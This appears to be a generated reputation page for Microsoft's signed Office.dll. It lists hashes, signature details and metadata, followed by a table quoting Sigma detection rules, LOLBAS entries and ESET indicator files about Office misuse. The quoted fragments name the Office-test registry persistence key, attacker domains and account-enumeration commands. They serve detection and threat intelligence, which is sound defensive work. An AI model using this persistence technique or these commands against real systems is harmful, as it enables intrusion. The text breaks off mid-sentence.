Office.dll
- File Path:
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll - Description: Microsoft.Office.Core
Hashes
| Type | Hash |
|---|---|
| MD5 | 57FDD8BE6071DFC46128DCCAD5E25863 |
| SHA1 | F0601F41B06D836183442FE98BECD84400CF98D1 |
| SHA256 | 0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E |
| SHA384 | D12328D6134315401A6BC7EA0D59409358ABCB06A5C9A4EB8B1FB9C7A1B8E6FC76C0308716DC25CB15E6FCDAA7F01D8C |
| SHA512 | C9C44F63862EE6BE2C02489E6AC2DBEE91990734912809A94C73B38DFCCAF98B63F309CE75BE64631CB696788981738400B1C45DFA6872AC552B4BBD6B0E6E2C |
| SSDEEP | 12288:vsVUG62f8eQPrlGC9uk9IsbVYVsTEVcyjlycUn8:vsVUG62f8eQPrjY6VYViEX |
| IMP | DAE02F32A21E03CE65412F6E56942DAA |
| PESHA1 | FC44CD355B0011F7C2864B1C1F3D9EF2590AAAC1 |
| PE256 | 813E1FECE65C0944DE77F774604470178AE47ACFB8CDAB1CDE43975566AE4C03 |
Signature
- Status: Signature verified.
- Serial:
330000010A2C79AED7797BA6AC00010000010A - Thumbprint:
3BDA323E552DB1FDE5F4FBEE75D6D5B2B187EEDC - Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename: Core Primary Interop Assembly
- Product Name: Microsoft Office 2010
- Company Name: Microsoft Corporation
- File Version: 14.0.4733.1000
- Product Version: 14.0.4733.1000
- Language: Language Neutral
- Legal Copyright: 2010 Microsoft Corporation. All rights reserved.
- Machine Type: 32-bit
File Scan
- VirusTotal Detections: 0/72
- VirusTotal Link: https://www.virustotal.com/gui/file/0194c022c826d59407487096d208896a2465ba1a4c58eac1d1ab96d9c2376a7e/detection/
Possible Misuse
The following table contains possible examples of Office.dll being misused. While Office.dll is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | # Office Dropper Detection |
DRL 1.0 |
| sigma | proxy_ua_apt.yml | - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html |
DRL 1.0 |
| sigma | sysmon_office_persistence.yml | title: Microsoft Office Add-In Loading |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_assembly_dll_load.yml | title: dotNET DLL Loaded Via Office Applications |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_assembly_dll_load.yml | description: Detects any assembly DLL being loaded by an Office Product |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_clr_dll_load.yml | title: CLR DLL Loaded Via Office Applications |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_clr_dll_load.yml | description: Detects CLR DLL being loaded by an Office Product |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_gac_dll_load.yml | title: GAC DLL Loaded Via Office Applications |
DRL 1.0 |
| sigma | sysmon_susp_office_dotnet_gac_dll_load.yml | description: Detects any GAC DLL being loaded by an Office Product |
DRL 1.0 |
| sigma | sysmon_susp_office_dsparse_dll_load.yml | title: Active Directory Parsing DLL Loaded Via Office Applications |
DRL 1.0 |
| sigma | sysmon_susp_office_dsparse_dll_load.yml | description: Detects DSParse DLL being loaded by an Office Product |
DRL 1.0 |
| sigma | sysmon_susp_office_kerberos_dll_load.yml | title: Active Directory Kerberos DLL Loaded Via Office Applications |
DRL 1.0 |
| sigma | sysmon_susp_office_kerberos_dll_load.yml | description: Detects Kerberos DLL being loaded by an Office Product |
DRL 1.0 |
| sigma | sysmon_malware_verclsid_shellcode.yml | description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro |
DRL 1.0 |
| sigma | sysmon_malware_verclsid_shellcode.yml | SourceImage: '*\Microsoft Office\\*' |
DRL 1.0 |
| sigma | win_exploit_cve_2017_11882.yml | - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw |
DRL 1.0 |
| sigma | win_office_shell.yml | title: Microsoft Office Product Spawning Windows Shell |
DRL 1.0 |
| sigma | win_office_spawn_exe_from_users_directory.yml | title: MS Office Product Spawning Exe in User Dir |
DRL 1.0 |
| sigma | win_susp_msoffice.yml | title: Malicious Payload Download via Office Binaries |
DRL 1.0 |
| sigma | win_susp_msoffice.yml | - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
DRL 1.0 |
| sigma | sysmon_office_test_regadd.yml | title: Office Application Startup - Office Test |
DRL 1.0 |
| sigma | sysmon_office_test_regadd.yml | description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started |
DRL 1.0 |
| sigma | sysmon_office_test_regadd.yml | - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' |
DRL 1.0 |
| sigma | sysmon_office_test_regadd.yml | - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' |
DRL 1.0 |
| sigma | sysmon_reg_office_security.yml | title: Office Security Settings Changed |
DRL 1.0 |
| sigma | sysmon_reg_office_security.yml | description: Detects registry changes to Office macro settings |
DRL 1.0 |
| LOLBAS | Winword.yml | Description: Document editor included with Microsoft Office. |
|
| LOLBAS | Winword.yml | - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
|
| LOLBAS | Appvlp.yml | Description: Application Virtualization Utility Included with Microsoft Office 2016 |
|
| LOLBAS | Appvlp.yml | OperatingSystem: Windows 10 w/Office 2016 |
|
| LOLBAS | Appvlp.yml | - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe |
|
| LOLBAS | Appvlp.yml | - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe |
|
| LOLBAS | Appvlp.yml | - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ |
|
| LOLBAS | Excel.yml | Description: Microsoft Office binary |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe |
|
| LOLBAS | Excel.yml | - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe |
|
| LOLBAS | Excel.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
|
| LOLBAS | Powerpnt.yml | Description: Microsoft Office binary. |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe |
|
| LOLBAS | Powerpnt.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
|
| LOLBAS | Sqldumper.yml | - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe |
|
| LOLBAS | Winword.yml | Description: Microsoft Office binary |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office16\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office15\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office14\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe |
|
| LOLBAS | Winword.yml | - Path: C:\Program Files\Microsoft Office\Office12\winword.exe |
|
| LOLBAS | Winword.yml | - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
|
| malware-ioc | misp-dukes-operation-ghost-event.json | "Office Monkeys", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "https://www.uperesia.com/analyzing-malicious-office-documents" |
© ESET 2014-2018 |
| malware-ioc | misp-dukes-operation-ghost-event.json | "https://github.com/itsreallynick/office-crackros" |
© ESET 2014-2018 |
| malware-ioc | gamaredon | \|DFC941F365E065187B5C4A4BF42E770035920856\|C# Office macro injection module\|Win32/Pterodo.XG.gen |
© ESET 2014-2018 |
| malware-ioc | gamaredon | \|9AFC9D6D72F78B2EB72C5F2B87BDC7D59C1A14ED\|Batch file/VBScript Office macro injection module\|Win32/Pterodo.ZM |
© ESET 2014-2018 |
| malware-ioc | gamaredon | office-constructor.ddns.net |
© ESET 2014-2018 |
| malware-ioc | interception | https://km.wu.ac[.]th/image/office.jpg |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "https://www.uperesia.com/analyzing-malicious-office-documents" |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "https://github.com/itsreallynick/office-crackros" |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "Office 365 account logs", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "Office 365", |
© ESET 2014-2018 |
| malware-ioc | misp_invisimole.json | "description": "Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.\n\nAlso, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.\n\n### Office 365 and Azure AD\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)", |
© ESET 2014-2018 |
| malware-ioc | nouns.txt | office |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-macOS.misp.event.json | "https:\/\/github.com\/itsreallynick\/office-crackros", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "value": "office.ourkekwiciver.com", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "https:\/\/github.com\/itsreallynick\/office-crackros"] |
© ESET 2014-2018 |
| malware-ioc | oceanlotus-rtf_ocx_campaigns.misp.event.json | "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", |
© ESET 2014-2018 |
| malware-ioc | oceanlotus | * office.ourkekwiciver.com`` |
© ESET 2014-2018 |
| malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc | - 18b7dd3917231d7bae93c11f915e9702aa5d1bbb - Office RCE |
© ESET 2014-2018 |
| malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc | - HKCU\Software\Microsoft\Office test\Special\Perf|%TEMP%\apisecconnect.dll`` |
© ESET 2014-2018 |
| malware-ioc | 2017-05-09_Trump_Attack_on_Syria_IoCs.json | "value": "HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\|%TEMP%\\apisecconnect.dll", |
© ESET 2014-2018 |
| malware-ioc | part1.adoc | HKCU\Software\Microsoft\Office test\Special\Perf |
© ESET 2014-2018 |
| malware-ioc | stantinko | var b = "mts rt megafonpro megafon mpoisk mail google yandex ya rambler youtube dfiles turbobit prom zakupka pravo letitbit ozon urokitio kismia webnice toy mdmbank tele2 roboforex share4web 7do dixy kiino 4allforum delo-press raskachaem satu spmag yugcontract narodnoe materinstvo dimonvideo kia-club deal icloud littlebyte maxpark 24video vdgb trud appsruel tiu blanker aucland office ontabfile microsoft shopotam shareflare autoportal stilagoby malina depositfiles hitfile crocs telecom effectfree forum.calorizator.ru traektoria cdek takko circ-a tinydeal otzyv mamba rusfolder irn labirint vip-file 10.150.0.104".split(" "); |
© ESET 2014-2018 |
| malware-ioc | misp-mosquito-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", |
© ESET 2014-2018 |
| malware-ioc | misp-turla-comrat-v4-event.json | "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian 